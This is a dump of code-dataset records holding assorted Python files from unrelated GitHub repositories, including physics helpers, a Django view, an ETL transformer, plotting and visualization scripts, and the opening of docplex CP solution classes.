app.run(debug = True)\n","repo_name":"alexying2110/covid_vis","sub_path":"server_test/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11636885100","text":"first_string, second_string = input().split()\ntotal_sum = 0\nlonger_string = \"\"\nshorter_string = \"\"\nlen_to_multiply = 0\nrest_len = 0\n\nif len(first_string) > len(second_string):\n longer_string = first_string\n shorter_string = second_string\n\nelif len(second_string) > len(first_string):\n longer_string = second_string\n shorter_string = first_string\n\nelse: #equal\n longer_string = first_string\n shorter_string = second_string\n\ndiff = len(longer_string) - len(shorter_string)\n\nlen_to_multiply = len(longer_string) - diff\nrest_len = diff\nrest_word = longer_string[len(shorter_string):len(longer_string):]\n\nfor index in range(len_to_multiply):\n total_sum += ord(longer_string[index]) * ord(shorter_string[index])\n\nif rest_len:\n for index in range(rest_len):\n total_sum += ord(rest_word[index])\n\nprint(total_sum)\n","repo_name":"ahmedbuchev/SoftUni-Python","sub_path":"01.Fundamentals/09.text_processing/exercise/character_multiplier.py","file_name":"character_multiplier.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19358379525","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Functions related to water vapor and its thermodynamic effects\n\"\"\"\nimport numpy as np\n\nfrom typhon import constants\n\n\n__all__ = [\n 'e_eq_ice_mk',\n 'e_eq_water_mk',\n 'density',\n]\n\n\ndef e_eq_ice_mk(T):\n r\"\"\"Calculate the equilibrium water vapor pressure over ice.\n\n Equilibrium water vapor pressure over ice using Murphy and Koop 2005\n parameterization formula.\n\n .. math::\n \\ln(e_i) = 9.550426\n - \\frac{5723.265}{T}\n + 3.53068 \\cdot \\ln(T)\n - 0.00728332 \\cdot T\n\n Parameters:\n T (float or ndarray): Temperature in [K].\n\n Returns:\n float or ndarray: Equilibrium water vapor pressure over ice in [Pa].\n\n References:\n Murphy, D. M. and Koop, T. (2005): Review of the vapour pressures of\n ice and supercooled water for atmospheric applications,\n Quarterly Journal of the Royal Meteorological Society 131(608):\n 1539–1565. doi:10.1256/qj.04.94\n\n \"\"\"\n if np.any(T <= 0):\n raise Exception('Temperatures must be larger than 0 Kelvin.')\n\n # Give the natural log of saturation vapor pressure over ice in Pa\n e = 9.550426 - 5723.265 / T + 3.53068 * np.log(T) - 0.00728332 * T\n\n return np.exp(e)\n\n\ndef e_eq_water_mk(T):\n r\"\"\"Calculate the equilibrium water vapor pressure over water.\n\n Equilibrium water vapor pressure over water using Murphy and\n Koop 2005 parameterization formula.\n\n .. math::\n \\ln(e_w) &= 54.842763 - \\frac{6763.22}{T} - 4.21 \\cdot \\ln(T) \\\\\n &+ 0.000367 \\cdot T\n + \\tanh \\left(0.0415 \\cdot (T - 218.8)\\right) \\\\\n &\\cdot \\left(53.878 - \\frac{1331.22}{T}\n - 9.44523 \\cdot \\ln(T)\n + 0.014025 \\cdot T \\right)\n\n Parameters:\n T (float or ndarray): Temperature in [K].\n\n Returns:\n float or ndarray: Equilibrium water vapor pressure over water in [Pa].\n\n References:\n Murphy, D. M. and Koop, T. (2005): Review of the vapour pressures of\n ice and supercooled water for atmospheric applications,\n Quarterly Journal of the Royal Meteorological Society 131(608):\n 1539–1565. doi:10.1256/qj.04.94\n\n \"\"\"\n if np.any(T <= 0):\n raise Exception('Temperatures must be larger than 0 Kelvin.')\n\n # Give the natural log of saturation vapor pressure over water in Pa\n\n e = (54.842763\n - 6763.22 / T\n - 4.21 * np.log(T)\n + 0.000367 * T\n + np.tanh(0.0415 * (T - 218.8))\n * (53.878 - 1331.22 / T - 9.44523 * np.log(T) + 0.014025 * T))\n\n return np.exp(e)\n\n\ndef density(p, T, R=constants.gas_constant_dry_air):\n r\"\"\"Calculates gas density by ideal gas law.\n\n .. math::\n \\rho = \\frac{p}{R \\cdot T}\n\n Parameters:\n p (float or ndarray): Pressure [Pa.]\n T (float or ndarray): Temperature [K].\n If type of T and p is ndarray, size must match p.\n R (float): Gas constant [J K^-1 kg^-1].\n Default is gas constant for dry air.\n\n Returns:\n float or ndarray: Density [kg/m**3].\n\n See also:\n :mod:`typhon.constants`\n Module containing universal gas constant as well\n as gas constants for dry air and water vapor.\n\n Examples:\n >>> density(1013e2, 300)\n 1.1763056653021122\n \"\"\"\n return p / (R * T)\n","repo_name":"simonpf/furry-guacamole","sub_path":"typhon/physics/thermodynamics.py","file_name":"thermodynamics.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14770256218","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import permission_required\nfrom juntagrico.entity.member import Member\n\n\n@permission_required('badge.can_change')\ndef members_list(request):\n render_dict = {\n 'change_date_disabled': True,\n 'management_list': Member.objects.filter(badges__isnull=False).distinct()\n }\n return render(request, 'jbg/management_lists/badges.html', render_dict)\n","repo_name":"juntagrico/juntagrico-badges","sub_path":"juntagrico_badges/views_admin.py","file_name":"views_admin.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3441859343","text":"from DataSource import Extract\nimport json\nimport pandas as pd\nimport numpy as np \n\nclass Transformation:\n\n\tdef __init__(self):\n\t\textractObj = Extract()\n\n\t\t# load API data\n\t\tself.goal_data = extractObj.getAPISData('Goals')\n\t\tself.player_data = extractObj.getAPISData('Players')\n\t\tself.team_data = extractObj.getAPISData('Teams')\n\t\tself.games_data = extractObj.getAPISData('Games')\n\t\tself.rounds_data = extractObj.getAPISData('Rounds')\n\n\tdef GoalData(self):\n\t\t# list of columns to be added in a dataframe\n\t\tid_=[]\n\t\tperson_id=[]\n\t\tgame_id =[]\n\t\tteam_id = []\n\t\tpenalty = []\n\t\towngoal = []\n\t\tminute=[]\n\t\tteam_score=[]\n\t\topponent_score=[]\n\t\t# function to append data into lists\n\t\tdef append_goal_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\tperson_id.append(dict_['person_id'])\n\t\t\tgame_id.append(dict_['game_id'])\n\t\t\tteam_id.append(dict_['team_id'])\n\t\t\tpenalty.append(dict_['penalty'])\n\t\t\towngoal.append(dict_['owngoal'])\n\t\t\tminute.append(dict_['minute'])\n\t\t\tteam_score.append(dict_['score1'])\n\t\t\topponent_score.append(dict_['score2'])\n\t\t#extract dictionary from string and append it in a list\n\t\tmy_list = self.goal_data.split('\\n') \n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_goal_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_goal_data(dict_)\n\t\t\t\t\n\t\t# create dataframe using lists \n\t\tself.data_csv = pd.DataFrame({'id':id_,'person_id':person_id,'game_id':game_id,'team_id':team_id,\n\t\t\t'penalty':penalty,'owngoal':owngoal,'minute':minute,'team_score':team_score,\n\t\t\t'opponent_score':opponent_score})\n\t\treturn self.data_csv #return a dataframe\n\n\tdef PlayerData(self):\n\t\tid_=[]\n\t\tname=[]\n\t\tdef append_player_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\tname.append(dict_['name'])\n\t\tmy_list = self.player_data.split('\\n')\n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_player_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_player_data(dict_)\n\t\tself.data_csv = pd.DataFrame({'id':id_,'name':name})\t\t\n\t\treturn self.data_csv\n\t\t\n\tdef TeamData(self):\n\t\tid_=[]\n\t\ttitle=[]\n\t\tdef append_team_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\ttitle.append(dict_['title'])\n\t\tmy_list = self.team_data.split('\\n')\n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_team_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_team_data(dict_)\n\t\tself.data_csv = pd.DataFrame({'id':id_,'title':title})\n\t\treturn self.data_csv\n\n\tdef GameData(self):\n\t\tid_=[]\n\t\tteam1_id=[]\n\t\tteam2_id=[]\n\t\tknockout = []\n\t\tround_id = []\n\t\tdef append_game_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\tteam1_id.append(dict_['team1_id'])\n\t\t\tteam2_id.append(dict_['team2_id'])\n\t\t\tknockout.append(dict_['knockout'])\n\t\t\tround_id.append(dict_['round_id'])\n\t\tmy_list = self.games_data.split('\\n')\n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_game_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_game_data(dict_)\n\t\tself.data_csv = pd.DataFrame({'id':id_,'team1_id':team1_id,'team2_id':team2_id,'knockout':knockout,\n\t\t\t'round_id':round_id})\n\t\treturn self.data_csv\n\n\tdef RoundsData(self):\n\t\tid_=[]\n\t\ttitle=[]\n\t\tdef append_round_data(dict_):\n\t\t\tid_.append(dict_['id'])\n\t\t\ttitle.append(dict_['title'])\n\t\tmy_list = self.rounds_data.split('\\n')\n\t\tfor i in range(1,len(my_list)-1):\n\t\t\tif i != len(my_list)-2:\n\t\t\t\tdict_ = json.loads(my_list[i][:-1])\n\t\t\t\tappend_round_data(dict_)\n\t\t\telse: \n\t\t\t\tdict_ = json.loads(my_list[i])\n\t\t\t\tappend_round_data(dict_)\n\t\tself.data_csv = pd.DataFrame({'id':id_,'title':title})\n\t\treturn self.data_csv\n\n#test run\n# Transformation().GoalData()\n# Transformation().GameData()\n# Transformation().PlayerData()\n# Transformation().RoundsData()\n# Transformation().TeamData()\n\n# print('Successfully Transformed')\n\n\n","repo_name":"gitSuyash/Fifa-ETL-Analysis","sub_path":"Transformation/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32179419740","text":"# Write a program to implement dda algorithm\r\nfrom matplotlib import pyplot as plt\r\nx1=int(input(\"Enter x1: \")) \r\ny1=int(input(\"Enter y1: \")) \r\nx2=int(input(\"Enter x2: \")) \r\ny2=int(input(\"Enter y2: \")) \r\ndx=x2-x1 \r\ndy=y2-y1\r\nm=dy/dx\r\nlx=[]\r\nly=[]\r\nwhile(x1<=x2):\r\n lx.append(x1)\r\n ly.append(y1)\r\n x1=x1+1\r\n y1=y1+m*dx\r\nplt.plot(lx,ly)\r\nplt.xlim(0,200)\r\nplt.ylim(0,200)\r\nplt.xlabel(\"X-axis\")\r\nplt.ylabel(\"Y-axis\")\r\nplt.title(\"DDA Line Drawing Algorithm\")\r\nplt.show()\r\n","repo_name":"Abhishek0012/Computer-Graphics","sub_path":"File/dda.py","file_name":"dda.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23861409938","text":"from sys import *\ninput = stdin.readline\nimport math\nfrom collections import Counter\ns = input()\nn = len(s)\narr = Counter(list(s.strip()))\nprint(arr)\nans = []\n#zm = 0\nss = max(arr.values())\ncc = ss\n#xx = math.gcd()\nfor k in arr:\n cc = math.gcd(arr[k], cc)\n print(cc, k, ss)\n if cc == 1:\n print(\"IMPOSSIBLE\")\n exit()\n else:\n ans.append(k*(arr[k]//cc))\nprint(''.join(ans))","repo_name":"35C4n0r/Codeforces-Py-","sub_path":"PycharmProjects/mBit 2020/Pok´emon Permutation.py","file_name":"Pok´emon Permutation.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5169476879","text":"import unittest\nfrom app import create_app, db\nfrom app.models import User, AnonymousUser, Role, Permission\n\n\nclass UserModelTestCase(unittest.TestCase):\n # More tests are coming\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n Role.insert_roles()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_roles_and_permissions(self):\n Role.insert_roles()\n u = User(email='john@example.com')\n self.assertTrue(u.can(Permission.VIEW_CONTACTS))\n self.assertFalse(u.can(Permission.MODERATE))\n\n def test_anonymous_user(self):\n u = AnonymousUser()\n self.assertFalse(u.can(Permission.VIEW_CONTACTS))","repo_name":"agladyshev/FSND-brewlocker","sub_path":"tests/test_user_model.py","file_name":"test_user_model.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14250144716","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\nimport numpy as np\nimport os\n# importing movie py libraries\nfrom moviepy.editor import VideoClip, clips_array\nfrom moviepy.video.io.bindings import mplfig_to_npimage\nfrom utils import json_to_projectedPoints, json_to_annot, json_to_detection\nimport seaborn as sns\nfrom matplotlib.collections import PolyCollection\n\n###############################################################################################\n#\n# Help functions for visualization\n#\n###############################################################################################\n#plot_colors = ['blue','orange','green','red','purple','brown','pink','gray','olive','cyan']\nplot_colors = sns.color_palette()[:7]+sns.color_palette()[8:]\n\nvesselID2Color = {}\nvessel_count = 0\ndrop_frames3 = []\n\ndef get_color(vesselID):\n global vesselID2Color\n global vessel_count\n global plot_colors\n if vesselID in vesselID2Color.keys():\n return vesselID2Color[vesselID]\n color_index = vessel_count % len(plot_colors)\n vessel_count += 1\n vesselID2Color[vesselID] = plot_colors[color_index]\n return vesselID2Color[vesselID]\n\ndef get_dict_item(dict, key):\n try:\n return dict[key]\n except KeyError:\n try:\n return dict[str(key)]\n except KeyError:\n try:\n return dict[float(key)]\n except KeyError:\n return dict[int(key)]\n\ndef map_timestamp_to_video_time(time_stamps, fps, duration):\n '''\n Input:\n - all_projected_points (dict): {time_step: {vesselID: [ProjectedPoint1,..., ProjectedPoint8]}}\n - image_bound: (xmax, ymax)\n '''\n frames = {}\n idiot_time = 0.0\n for t in time_stamps:\n frames[round(idiot_time,3)] = t\n idiot_time += 1/fps\n if idiot_time > duration:\n return frames\n return frames\n \n###############################################################################################\n#\n# Dynamic scene visualization\n#\n###############################################################################################\n\n\ndef visualize_dynamic_scene_mov(vessels, folder_path='./gifs/', figsize=(6, 6), y_x_lim=400, fps=3, max_time_steps=None):\n '''\n Creates the plot image for the given time step\n Input:\n - t (int): current time step\n - vessels (array): List of vessels in the scene\n - figsize (int): Size of figure\n - y_x_lim (int): limitation of x and y axis\n '''\n fig, ax = plt.subplots(figsize=figsize)\n\n time_stamps = vessels[0].get_track().get_time_stamps()\n duration = int(len(time_stamps)/fps) # Because of the idiot FPS that i can't change!!!!\n if max_time_steps and int(max_time_steps/fps)0 and 0<= point.image_coordinate[0] <= image_bounds[0] and 0<= point.image_coordinate[1] <= image_bounds[1]\n for vesselID, points in projected_points.items():\n for point in points:\n if point_in_image(point): \n vessels.append(vesselID)\n break\n return vessels\n\ndef find_frames_pps_multiple_cameras(cameraIDs, all_projected_points, image_bounds, display_when_min_vessels, fps, max_time_steps):\n '''\n Input:\n - all_projected_points (dict): {time_step: {vesselID: [ProjectedPoint1,..., ProjectedPoint8]}}\n - image_bound: (xmax, ymax)\n '''\n frames_cam = {cameraID: {} for cameraID in cameraIDs}\n idiot_time = 0.0\n for t in all_projected_points[cameraIDs[0]].keys():\n vessels_in_image = 0 \n for cameraID in cameraIDs:\n vessels_in_image_cam = vessels_in_view_pps(all_projected_points[cameraID][t], image_bounds[cameraID])\n if len(vessels_in_image_cam) > vessels_in_image:\n vessels_in_image = len(vessels_in_image_cam)\n if vessels_in_image >= display_when_min_vessels:\n frame_time = round(idiot_time,3)\n for cameraID in cameraIDs:\n frames_cam[cameraID][frame_time] = {'time': t, 'pps': all_projected_points[cameraID][t]}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps= display_when_min_vessels:\n frames[round(idiot_time,3)] = {'time': t, 'pps': pps}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps=0])\n vessel_y = np.array([point.image_coordinate[1] for point in pps if point.depth>=0])\n ax.plot(vessel_x, vessel_y, 'o')\n #ax.fill_between(vessel_x, vessel_y, color='grey', alpha=0.5)\n # Order of cornerpoints (length, beam, height): \n # Front back lower, back back lower, \n # back front lower, front front lower, \n # Front back upper, back back upper, \n # back front upper, front front upper,\n if show_box and vessel_x.size == 8:\n xs = list(vessel_x[0:4])+[vessel_x[0]]+list(vessel_x[4:])+[vessel_x[4]]\n ys = list(vessel_y[0:4])+[vessel_y[0]]+list(vessel_y[4:])+[vessel_y[4]]\n ax.plot(xs, ys, 'k-')\n ax.plot([vessel_x[1], vessel_x[5]], [vessel_y[1], vessel_y[5]], 'k-')\n ax.plot([vessel_x[2], vessel_x[6]], [vessel_y[2], vessel_y[6]], 'k-')\n ax.plot([vessel_x[3], vessel_x[7]], [vessel_y[3], vessel_y[7]], 'k-')\n\n # Define the colors for each face\n grey_color = (0.7019607843137254, 0.7019607843137254, 0.7019607843137254)\n\n # Define the indices of the cube vertices that form each face\n face_indices = [[0, 1, 2, 3, 0], # Front face\n [1, 2, 6, 5, 1], # Right face\n [2, 3, 7, 6, 2], # Back face\n [3, 0, 4, 7, 3], # Left face\n [0, 1, 5, 4, 0], # Bottom face\n [4, 5, 6, 7, 4]] # Top face\n\n # Fill each face of the cube with a different color\n for indices in face_indices:\n face_x = [vessel_x[i] for i in indices]\n face_y = [vessel_y[i] for i in indices]\n ax.fill(face_x, face_y, color=grey_color, alpha=0.5)\n #ax.fill_between([xs[6], xs[5], xs[4], xs[7], xs[6]], [ys[6], ys[5], ys[4], ys[7], ys[6]], color='grey', alpha=0.5)\n #ax.fill_between([xs[6], xs[5]], [ys[6], ys[5]], color='red', alpha=0.5)\n #ax.fill_between([xs[0],xs[2]], [ys[0], ys[2]], color='green', alpha=0.5)\n #ax.fill_between([xs[1],xs[3]], [ys[1], ys[3]], color='orange', alpha=0.5)\n #ax.fill_between(xs[2:], ys[2:], color='yellow', alpha=0.5)\n #ax.fill_between(xs, ys, color='grey', alpha=0.5)\n #l = [[[xs[0], ys[0]], [xs[1], ys[1]]], [[xs[0], ys[0]], [xs[3], ys[3]]], [[xs[0], ys[0]], [xs[4], ys[4]]], [[xs[1], ys[1]], [xs[2], ys[2]]], [[xs[1], ys[1]], [xs[5], ys[5]]],[[xs[2], ys[2]], [xs[3], ys[3]]],[[xs[2], ys[2]], [xs[6], ys[6]]], [[xs[3], ys[3]], [xs[7], ys[7]]],[[xs[4], ys[4]], [xs[5], ys[5]]]]\n #pc2 = PolyCollection(l, facecolors='red', edgecolor=\"k\", alpha=0.9)\n #ax.add_collection(pc2)\n #ax.fill(pc2, facecolor='red')\n \n ax.set_xlim([0,image_bounds[0]])\n ax.set_ylim([image_bounds[1],0])\n ax.set_ylabel('y', fontsize = 14, rotation = 0, labelpad=10)\n ax.xaxis.tick_top()\n ax.set_xlabel('x', fontsize = 14) \n ax.xaxis.set_label_position('top') \n ax.tick_params(labelsize=ticks_fontsize)\n ax.set_title(f'Projected points at time {round(float(t)*frequency,1)}', fontsize=fontsize)\n\n # returning numpy image\n return mplfig_to_npimage(fig)\n \n # creating animation\n duration = int(len(frames)/fps) # Because of the idiot FPS that i can't change!!!!\n if max_time_steps and max_time_steps/fps1:\n final = clips_array([clips])\n filepath = os.path.join(folder_path, f'projectedPoints.mp4')\n final.write_videofile(filepath,fps=fps)\n###############################################################################################\n#\n# Bounding box visualization\n#\n###############################################################################################\ndef vessels_in_view_anns(annotations, image_bounds):\n '''\n Input:\n - annotations (dict): {vesselID: {label: string, 'bbox': BoundingBox}}\n - image_bound: (xmax, ymax)\n '''\n vessels = []\n def point_in_image(x, y):\n return 0<= x <= image_bounds[0] and 0<= y <= image_bounds[1]\n for vesselID, ann in annotations.items():\n xpoints, ypoints = ann['bbox'].get_points_for_visualizing()\n for i in range(len(xpoints)):\n if point_in_image(xpoints[i],ypoints[i]) and ann['bbox'].depth >= 0: \n vessels.append(vesselID)\n break\n return vessels\n\ndef find_frames_anns(annotations, image_bounds, display_when_min_vessels, fps, max_time_steps):\n '''\n Input:\n - annotations (dict): {vesselID: {label: string, 'bbox': BoundingBox}}\n - image_bound: (xmax, ymax)\n - display_when_min_vessels (int)\n '''\n frames = {}\n idiot_time = 0.0\n for t, anns in annotations.items():\n vessels_in_image = vessels_in_view_anns(anns, image_bounds)\n if len(vessels_in_image) >= display_when_min_vessels:\n frames[round(idiot_time,3)] = {'time': t, 'anns': anns}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps vessels_in_image:\n vessels_in_image = len(vessels_in_image_cam)\n if vessels_in_image >= display_when_min_vessels:\n frame_time = round(idiot_time,3)\n for cameraID in cameraIDs:\n frames_cam[cameraID][frame_time] = {'time': t, 'anns': annotations[cameraID][t]}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps1:\n final = clips_array([clips])\n filepath = os.path.join(folder_path, f'annotations.mp4')\n final.write_videofile(filepath,fps=fps)\n\n\n\n###############################################################################################\n#\n# Distorted Bounding box visualization\n#\n###############################################################################################\n\ndef find_frames_detections(detections, annotations, image_bounds, display_when_min_vessels, fps, max_time_steps):\n '''\n Input:\n - detections (dict): {vesselID: {label: string, 'bbox': BoundingBox, confidenceScore: float}}\n - image_bound: (xmax, ymax)\n - display_when_min_vessels (int)\n '''\n frames = {}\n idiot_time = 0.0\n if not annotations:\n # Include all frames\n for t, detections in detections.items():\n frames[round(idiot_time,3)] = {'time': t, 'detections': detections}\n idiot_time += 1/fps\n return frames\n for t, detections in detections.items():\n vessels_in_image = vessels_in_view_anns(annotations[t], image_bounds)\n if len(vessels_in_image) >= display_when_min_vessels:\n frames[round(idiot_time,3)] = {'time': t, 'detections': detections}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps vessels_in_image:\n vessels_in_image = len(vessels_in_image_cam)\n if vessels_in_image >= display_when_min_vessels:\n frame_time = round(idiot_time,3)\n for cameraID in cameraIDs:\n frames_cam[cameraID][frame_time] = {'time': t, 'detections': detections[cameraID][t]}\n idiot_time += 1/fps\n if max_time_steps and max_time_steps/fps1:\n final = clips_array([clips])\n filepath = os.path.join(folder_path, f'detections.mp4')\n final.write_videofile(filepath,fps=fps)\n","repo_name":"andreajessen/MODSIM","sub_path":"src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":36602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9477388008","text":"\nimport numpy as np\ndef extract_data(filename,num_images,IMAGE_WIDTH):\n print('Extracting',filename)\n with open(filename,'rb') as bytestream:\n bytestream.read(16)\n buf = bytestream.read(IMAGE_WIDTH*IMAGE_WIDTH*num_images)\n data = np.frombuffer(buf,dtype=np.uint8).astype(np.float)\n data = data.reshape(num_images,IMAGE_WIDTH * IMAGE_WIDTH)\n return data\n\n\n\n\ndef extract_labels(filename,num_images):\n print('Extracting',filename)\n with open(filename,'rb') as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf,dtype=np.uint8).astype(np.int64)\n return labels\n\n","repo_name":"recharbao/machine-learning","sub_path":"CNN/extractData/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38063770587","text":"import math\n\nMIN, MAX = map(int, input().split(' '))\n\nnum = [True] * (MAX - MIN + 1)\ncount = 0\nN = 1\n\nwhile N * N <= MAX:\n N += 1\n square = N * N\n i = MIN // square\n\n while square * i <= MAX:\n idx = square * i - MIN\n if idx >= 0 and num[idx]:\n count += 1\n num[idx] = False\n i += 1\nprint(len(num) - count)\n","repo_name":"shg9411/algo","sub_path":"algo_py/boj/bj1016.py","file_name":"bj1016.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"8770039189","text":"import docplex.cp.utils as utils\nfrom docplex.cp.utils import *\nfrom docplex.cp.expression import CpoVariable, CpoIntVar, CpoFloatVar, CpoIntervalVar, CpoSequenceVar, CpoStateFunction, \\\n INT_MIN, INT_MAX, INTERVAL_MIN, INTERVAL_MAX, POSITIVE_INFINITY, NEGATIVE_INFINITY, \\\n _domain_iterator, _domain_min, _domain_max, _domain_contains, \\\n compare_expressions\nfrom docplex.cp.parameters import CpoParameters\nimport types\nfrom collections import OrderedDict\nimport functools\n\n\n###############################################################################\n## Constants\n###############################################################################\n\n# Solve status: Unknown\nSOLVE_STATUS_UNKNOWN = \"Unknown\"\n\n# Solve status: Infeasible\nSOLVE_STATUS_INFEASIBLE = \"Infeasible\"\n\n# Solve status: Feasible\nSOLVE_STATUS_FEASIBLE = \"Feasible\"\n\n# Solve status: Optimal\nSOLVE_STATUS_OPTIMAL = \"Optimal\"\n\n# Solve status: Job aborted\nSOLVE_STATUS_JOB_ABORTED = \"JobAborted\"\n\n# Solve status: Job failed\nSOLVE_STATUS_JOB_FAILED = \"JobFailed\"\n\n# List of all possible solve statuses\nALL_SOLVE_STATUSES = (SOLVE_STATUS_UNKNOWN,\n SOLVE_STATUS_INFEASIBLE, SOLVE_STATUS_FEASIBLE, SOLVE_STATUS_OPTIMAL,\n SOLVE_STATUS_JOB_ABORTED, SOLVE_STATUS_JOB_FAILED)\n\n\n# Fail status: Unknown\nFAIL_STATUS_UNKNOWN = \"Unknown\"\n\n# Fail status: Failed normally\nFAIL_STATUS_FAILED_NORMALLY = \"SearchHasFailedNormally\"\n\n# Fail status: Not failed (success)\nFAIL_STATUS_HAS_NOT_FAILED = \"SearchHasNotFailed\"\n\n# Fail status: Stopped by abort\nFAIL_STATUS_ABORT = \"SearchStoppedByAbort\"\n\n# Fail status: Stopped by exception\nFAIL_STATUS_EXCEPTION = \"SearchStoppedByException\"\n\n# Fail status: Stopped by exit\nFAIL_STATUS_EXIT = \"SearchStoppedByExit\"\n\n# Fail status: Stopped by label\nFAIL_STATUS_LABEL = \"SearchStoppedByLabel\"\n\n# Fail status: Stopped by time limit\nFAIL_STATUS_TIME_LIMIT = \"SearchStoppedByLimit\"\n\n# Fail status: Search completed\nFAIL_STATUS_SEARCH_COMPLETED = \"SearchCompleted\"\n\n# List of all possible search statuses\nALL_FAIL_STATUSES = (FAIL_STATUS_UNKNOWN,\n FAIL_STATUS_FAILED_NORMALLY, FAIL_STATUS_HAS_NOT_FAILED,\n FAIL_STATUS_ABORT, FAIL_STATUS_EXCEPTION, FAIL_STATUS_EXIT, FAIL_STATUS_LABEL,\n FAIL_STATUS_TIME_LIMIT, FAIL_STATUS_SEARCH_COMPLETED)\n\n\n# Search status: Not started\nSEARCH_STATUS_NOT_STARTED = \"SearchNotStarted\"\n\n# Search status: Ongoing\nSEARCH_STATUS_ONGOING = \"SearchOngoing\"\n\n# Search status: Completed\nSEARCH_STATUS_COMPLETED = \"SearchCompleted\"\n\n# Search status: Stopped. Cause given in SearchStopCause.\nSEARCH_STATUS_STOPPED = \"SearchStopped\"\n\n# List of all possible search statuses\nALL_SEARCH_STATUSES = (SEARCH_STATUS_NOT_STARTED, SEARCH_STATUS_ONGOING, SEARCH_STATUS_COMPLETED, SEARCH_STATUS_STOPPED)\n\n\n# Stop cause: Not stopped\nSTOP_CAUSE_NOT_STOPPED = \"SearchHasNotBeenStopped\"\n\n# Stop cause: Search terminated on limit (time limit, fail limit, etc)\nSTOP_CAUSE_LIMIT = \"SearchStoppedByLimit\"\n\n# Stop cause: Exit called while solving, for example by a callback\nSTOP_CAUSE_EXIT = \"SearchStoppedByExit\"\n\n# Stop cause: Search aborted externally\nSTOP_CAUSE_ABORT = \"SearchStoppedByAbort\"\n\n# Stop cause: Unknown cause\nSTOP_CAUSE_UNKNOWN = \"SearchStoppedByUnknownCause\"\n\n# List of all possible stop causes\nALL_STOP_CAUSES = (STOP_CAUSE_NOT_STOPPED, STOP_CAUSE_LIMIT, STOP_CAUSE_EXIT, STOP_CAUSE_ABORT, STOP_CAUSE_UNKNOWN)\n\n\n###############################################################################\n## Public classes\n###############################################################################\n\nclass CpoVarSolution(object):\n \"\"\" This class is a super class of all classes representing a solution to a variable.\n \"\"\"\n __slots__ = ('expr', # Variable expression\n )\n \n def __init__(self, expr):\n \"\"\" Constructor:\n\n Args:\n expr: Variable expression, object of class :class:`~docplex.cp.expression.CpoVariable` or extending class.\n \"\"\"\n # Checking already done by extending classes\n # assert isinstance(expr, CpoVariable), \"Expression 'expr' should be a CPO variable expression\"\n self.expr = expr\n\n\n def get_expr(self):\n \"\"\" Gets the expression of the variable.\n\n Returns:\n Model expression of the variable.\n \"\"\"\n return self.expr\n\n\n def get_name(self):\n \"\"\" Gets the name of the variable.\n\n Returns:\n Name of the variable, None if anonymous.\n \"\"\"\n return self.expr.get_name()\n\n\n def get_value(self):\n \"\"\" Gets the variable value.\n This method is overloaded by each class extending this class.\n\n Returns:\n Value of the variable, represented according to its semantic (see specific variable documentation).\n \"\"\"\n return None\n\n\n def __eq__(self, other):\n \"\"\" Overwrite equality comparison\n\n Args:\n other: Other object to compare 